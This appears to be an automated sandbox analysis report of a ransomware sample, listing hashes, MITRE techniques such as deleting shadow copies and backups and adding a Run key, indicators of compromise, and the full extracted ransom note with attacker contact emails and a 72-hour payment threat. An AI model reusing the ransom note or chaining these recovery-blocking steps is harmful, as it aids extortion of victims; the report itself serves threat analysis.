f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50

Analysis

max time kernel
150s
max time network
129s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-02-2024 18:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
Size

333KB
MD5

169d9a666d9d56e1c7396cac6591af49
SHA1

cb61440e03d74116ce70a23307a600f04bb58eed
SHA256

f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50
SHA512

619ec05142929ecc1349a5a68a24953a1877308bedc6c52e698fc379d34b7e4dfb7e07cf5da63547cf26ee4c87fdbac8c75fe325a3c277e0d48dddc8b927013e
SSDEEP

6144:Bkv89W2QcboLPlZbqEKvSlvgXCBVnTDg3GV06rPnej63AbyEXq:Bk09XelZbqEKv8gXCBlPHe1yEXq

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

\Device\HarddiskVolume1\Boot\hu-HU\How_to_back_files.html

Ransom Note

<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">SioNRPnlEC5E6ez+/A2w0CmDJxD3IoJRGRc/jJ3RDgaU1n3NweGGY5asc3+J47uA/cjGty8nGEwZdo04XI9efOAjJp0n3yUF0RSXv6MYQyC+o0Cta5QSZhtOVaTB83HUya50cMFFTZ9RsQEki459KmD0wiK8sw3X7nSKZEYQNGRbc+/5Hm1aAUNUTGhzc/c4eFfnwGcjFK6UMwCvbFnJnjv7yt+5yYOdnmq+K1NOzkjjiBfYJifOSfQzcgveR4xoZdJX0iHpeLEEHld5HVVlD7i0PcsaorGoRqjSY+z3JAXZo4zgYIAkbc3tyPq7D1LCDL23kJta7N9ZljGacZVFIsDKBqIeTvnyXkZGtq4PLn4Mg8O2jnk4LDrWVAgAy5jTeIh0OiKJvw0EVWvyGlBaVAHlxabEZ31Ki4PJyguovLRv6YQiNoVeZD2prlgscQQVuUJkwAUKEX0MiGfQ5LSnhwCHpXGUIduBiNctWKlhheF4wjbqhER/SQrDI6wDLrM3ftSQMwTwGu+G/DynJOomZcEqdfQTvj4dgr+Pxjzq9nZQ8ZYQ72NpMVMseB1icvgzdzQsc17MOCUy0NFkg14pBoQmZ1o3zELx7mjLIqNjHIjAOVpGrz78mk75MI9cdfKINL/NZpJfVhVY08B/KqbxN4uNLk9RGLUtmDIl+SAbJEYcPrRVxqxMCUD0MvQRQZR97vXcQfiFbS1hujeFH729aog4dFkz5k3Cqvx6T9PtgDOQHAAAjgXXuxbZDFxuCCh2rQPJhyNu1ij9QV1pbU7cSJkhUcf8HdFpj/YBjXqPby+J6aKpSjbVv/uHlmL7K6bYedOFV5MEWnyIKGxC6GxayMeZ3u5PeSfMyhJzOhfELReEAoKg3wpV8UOxVDHPvTJtxwHKFqI/juWNnzjungv2t4LeWq5pUBoVskwhcIQauPp720NYqUw8/4WUNvSb9i3fDmxrIkmQ5ui72x5zfjXLqB8R05Z+Hs7JvH0PV2IRsisOAGeFF9HqF9RuhX6SEhZQHlDJF2sFlGCkhN8o7JRWX1J8GeoYb3J/by0EPO1IrulDjvh/XhdOZroGdO00NxZyx2d32UvlOBh1wVlhgM0XpRbUHJgvezPYZ+82vJiWKLVHeGtbXr7qyPGPv0+tzOnx4R5X1PENUkgAcJXIv4y0yLvWR0QGzFMWY/9huUTUGWu5tpzv8fQ1hdNlogvzprPUnIL0OAOLvduT+2dxlNZqsjchNmOkRd+GO/sxHSOvIo3/vit/fT1PLLM/jBvVnn2sk/cxA1BAHTYfU6qd+ueVU79gOv9gtewEI0LrfmUytJ/qxSuXyGJtz2W9FCatE7qLqjb2P7tpYE4K18cBR/FNGYfhBfTOVXZtSEJIlTSBOLaDBm6NVAslTa3fDdjQQrRFjf6JkIa+hoGZlwsp7IPD6ij0+aA7U/eCaT6y//ZRZIxEk667XtUrIwQ2mHgxgAMhE8MTIpZGMvN6HioCkBjkZh4C8KLslun3ZIQOx/mOW92Hx28TjlEO4s7KCcs5sZJdM9MaQILnTd3M9o/V04iCL8NcOcZQCU7IYEXcJVWkqOSXvQ2BsGWz68gN1mz8tkbBTcM2KG230xYClT7QtCpJAamQFKlnlV7uvoy4O6B2y/lwh6PC7hFyic3y+OKzn4knhCW40lWq7SR9pXXONDUU8mOg9Bc6AMwSR4ola9UGqH4=</span> <br>  </div> </div>  <div class="tabs">  <div class="tab"> <div id="tab-content1" class="content"> <div class="text">  <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br>  <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="ithelp08@securitymy.name ">ithelp08@securitymy.name </a> <br> <a href="ithelp08@yousheltered.com ">ithelp08@yousheltered.com </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div>   </div> </div>  </div> </div> </body> </html>

Emails

href="ithelp08@securitymy.name

">ithelp08@securitymy.name

href="ithelp08@yousheltered.com

">ithelp08@yousheltered.com

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe

description pid process target process

PID 2460 created 1204 2460 f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe Explorer.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1492 bcdedit.exe
2144 bcdedit.exe
Renames multiple (7559) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1400 wbadmin.exe
Deletes system backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

308 wbadmin.exe

description	pid	process	target process
PID 2460 created 1204	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	Explorer.EXE

pid	process
1492	bcdedit.exe
2144	bcdedit.exe

pid	process
1400	wbadmin.exe

pid	process
308	wbadmin.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exef584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe\""	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe\""	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe

Enumerates connected drives 3 TTPs 26 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.execipher.execipher.exe

description	ioc	process
File opened (read-only)	\??\L:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\U:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\F:	cipher.exe
File opened (read-only)	\??\Z:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\A:	cipher.exe
File opened (read-only)	\??\E:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\O:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\P:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\H:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\N:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\X:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\A:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\K:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\Q:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\R:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\W:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\F:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\B:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\G:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\I:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\J:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\M:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\T:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\V:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\Y:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened (read-only)	\??\S:	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe

Drops file in Program Files directory 64 IoCs

Processes:

f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Salta	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\How_to_back_files.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg.png	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\gadget.xml	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02161_.WMF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File created	C:\Program Files\Common Files\System\msadc\es-ES\How_to_back_files.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEWBY.GIF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01141_.WMF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15056_.GIF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Indian\Mahe	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Austin.eftx	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SlateBlue.css	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\How_to_back_files.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\es-ES\bckgzm.exe.mui	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\How_to_back_files.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03236_.WMF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\How_to_back_files.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\RegisterRedo.vdw	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\THMBNAIL.PNG	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\How_to_back_files.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUECALM\How_to_back_files.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01252_.WMF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\How_to_back_files.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG.wmv	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_hov.png	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR9F.GIF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\micaut.dll.mui	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EDGE\THMBNAIL.PNG	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239611.WMF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152602.WMF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21327_.GIF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTITL.ICO	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\settings.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File created	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\1033\How_to_back_files.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02115_.WMF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00685_.WMF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR14F.GIF	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\slideShow.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\How_to_back_files.html	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\default_thumb.jpg	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Horizon.eftx	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1696 vssadmin.exe

pid	process
1696	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2512	taskkill.exe
2376	taskkill.exe
1572	taskkill.exe
288	taskkill.exe
840	taskkill.exe
564	taskkill.exe
2000	taskkill.exe
1748	taskkill.exe
2500	taskkill.exe
1612	taskkill.exe
2564	taskkill.exe
1488	taskkill.exe
1508	taskkill.exe
2300	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe

pid	process
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
